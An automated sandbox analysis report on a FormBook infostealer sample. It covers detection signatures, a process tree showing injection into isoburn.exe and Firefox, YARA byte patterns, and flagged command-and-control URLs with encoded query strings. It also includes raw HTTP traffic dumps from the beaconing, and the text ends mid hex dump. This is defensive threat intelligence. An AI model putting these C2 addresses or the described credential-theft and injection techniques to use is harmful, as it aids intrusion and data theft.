Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_YTWHDF3432.exe

Overview

General Information

Sample Name:PO_YTWHDF3432.exe
Analysis ID:1352165
MD5:0bc4df2daa2bea193866307038113708
SHA1:7d90b61cfb0f9c54d301bb8ee6af650606efe862
SHA256:bf7c1a1fdf3903e051dcc7136e63e73ddc16e07c00d87553db63f4b7eadcb14e
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • PO_YTWHDF3432.exe (PID: 7680 cmdline: C:\Users\user\Desktop\PO_YTWHDF3432.exe MD5: 0BC4DF2DAA2BEA193866307038113708)
    • PO_YTWHDF3432.exe (PID: 7820 cmdline: C:\Users\user\Desktop\PO_YTWHDF3432.exe MD5: 0BC4DF2DAA2BEA193866307038113708)
      • qNENczArVjafOgvC.exe (PID: 7144 cmdline: "C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 7508 cmdline: C:\Windows\SysWOW64\isoburn.exe MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • qNENczArVjafOgvC.exe (PID: 5828 cmdline: "C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4016 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x27c20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x27c20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.PO_YTWHDF3432.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.PO_YTWHDF3432.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2aef3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x170d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.PO_YTWHDF3432.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.PO_YTWHDF3432.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2a0f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x162d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: PO_YTWHDF3432.exeReversingLabs: Detection: 62%
            Source: PO_YTWHDF3432.exeVirustotal: Detection: 80%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Antivirus / Scanner detection for submitted sample
            Source: PO_YTWHDF3432.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.makeinai.online/ahec/?Ot=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0CLYcLsXbR3hQ==&6d=QlZlAvira URL Cloud: Label: malware
            Source: http://www.611erhm.top/ahec/?Ot=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJnHNv+xYZWaEw==&6d=QlZlAvira URL Cloud: Label: phishing
            Source: http://www.instantconvey.com/ahec/?Ot=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClcm7p6TyxSZVg==&6d=QlZlAvira URL Cloud: Label: malware
            Source: http://www.jones4deepriver.com/ahec/?Ot=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBAHvy1fUTc2Bw==&6d=QlZlAvira URL Cloud: Label: malware
            Source: http://altralogos.com/ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4ZAvira URL Cloud: Label: malware
            Source: http://www.domainappraisalbot.com/ahec/?Ot=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JoJDCs0w/OhmA==&6d=QlZlAvira URL Cloud: Label: malware
            Source: http://www.77moea.top/ahec/Avira URL Cloud: Label: phishing
            Source: http://www.poria.link/ahec/Avira URL Cloud: Label: malware
            Source: http://www.fam-scharf.net/ahec/Avira URL Cloud: Label: malware
            Source: http://www.nesmalt.info/ahec/Avira URL Cloud: Label: malware
            Source: http://www.makeinai.online/ahec/Avira URL Cloud: Label: malware
            Source: http://www.thecoloringbitch.com/ahec/?Ot=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA7WUc9X1BQW9lg==&6d=QlZlAvira URL Cloud: Label: malware
            Source: http://www.thecoloringbitch.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.poria.link/ahec/?Ot=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VP3fUQbd2z87Q==&6d=QlZlAvira URL Cloud: Label: malware
            Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpAvira URL Cloud: Label: malware
            Source: http://www.77moea.top/ahec/?Ot=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy8WUnV35Ak22aw==&6d=QlZlAvira URL Cloud: Label: phishing
            Source: http://www.fam-scharf.net/ahec/?Ot=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUdGE6T0LcUEcA==&6d=QlZlAvira URL Cloud: Label: malware
            Source: http://www.domainappraisalbot.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.jones4deepriver.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.nesmalt.info/ahec/?Ot=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRudeX+UPGmLlgOAA==&6d=QlZlAvira URL Cloud: Label: malware
            Source: http://www.alldaysslimmingstea.com/ahec/?Ot=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVj0G3LunRoJLQ==&6d=QlZlAvira URL Cloud: Label: malware
            Source: http://www.altralogos.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.instantconvey.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.611erhm.top/ahec/Avira URL Cloud: Label: phishing
            Source: http://www.altralogos.com/ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfLNF+7YeihFeQ==&6d=QlZlAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: www.611erhm.topVirustotal: Detection: 12%Perma Link
            Source: fam-scharf.netVirustotal: Detection: 8%Perma Link
            Source: instantconvey.comVirustotal: Detection: 5%Perma Link
            Source: altralogos.comVirustotal: Detection: 16%Perma Link
            Source: wrautomotive.onlineVirustotal: Detection: 7%Perma Link
            Source: alldaysslimmingstea.comVirustotal: Detection: 13%Perma Link
            Source: thecoloringbitch.comVirustotal: Detection: 13%Perma Link
            Source: www.altralogos.comVirustotal: Detection: 12%Perma Link
            Source: www.77moea.topVirustotal: Detection: 10%Perma Link
            Source: www.thecoloringbitch.comVirustotal: Detection: 7%Perma Link
            Machine Learning detection for sample
            Source: PO_YTWHDF3432.exeJoe Sandbox ML: detected
            Source: PO_YTWHDF3432.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PO_YTWHDF3432.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: etn.pdbSHA256 source: PO_YTWHDF3432.exe
            Source: Binary string: isoburn.pdb source: PO_YTWHDF3432.exe, 00000003.00000002.1370505830.0000000001378000.00000004.00000020.00020000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000002.3730663846.0000000000678000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: PO_YTWHDF3432.exe, 00000003.00000002.1370505830.0000000001378000.00000004.00000020.00020000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000002.3730663846.0000000000678000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qNENczArVjafOgvC.exe, 0000000A.00000002.3723257708.000000000008E000.00000002.00000001.01000000.0000000C.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3723154626.000000000008E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_YTWHDF3432.exe, 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1372373369.0000000005227000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1370546693.0000000005072000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_YTWHDF3432.exe, PO_YTWHDF3432.exe, 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000B.00000003.1372373369.0000000005227000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1370546693.0000000005072000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: etn.pdb source: PO_YTWHDF3432.exe
            Source: Binary string: firefox.pdb source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EDC280 FindFirstFileW,FindNextFileW,FindClose,11_2_02EDC280
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then pop edi11_2_02ED1A10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax11_2_02EC99C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then pop edi11_2_02ECE2BF
            Source: Joe Sandbox ViewIP Address: 37.97.254.27 37.97.254.27
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:48:39 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 21:16:32 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 02 Dec 2023 17:48:55 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 02 Dec 2023 17:48:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 02 Dec 2023 17:49:01 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Sat, 02 Dec 2023 17:49:03 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 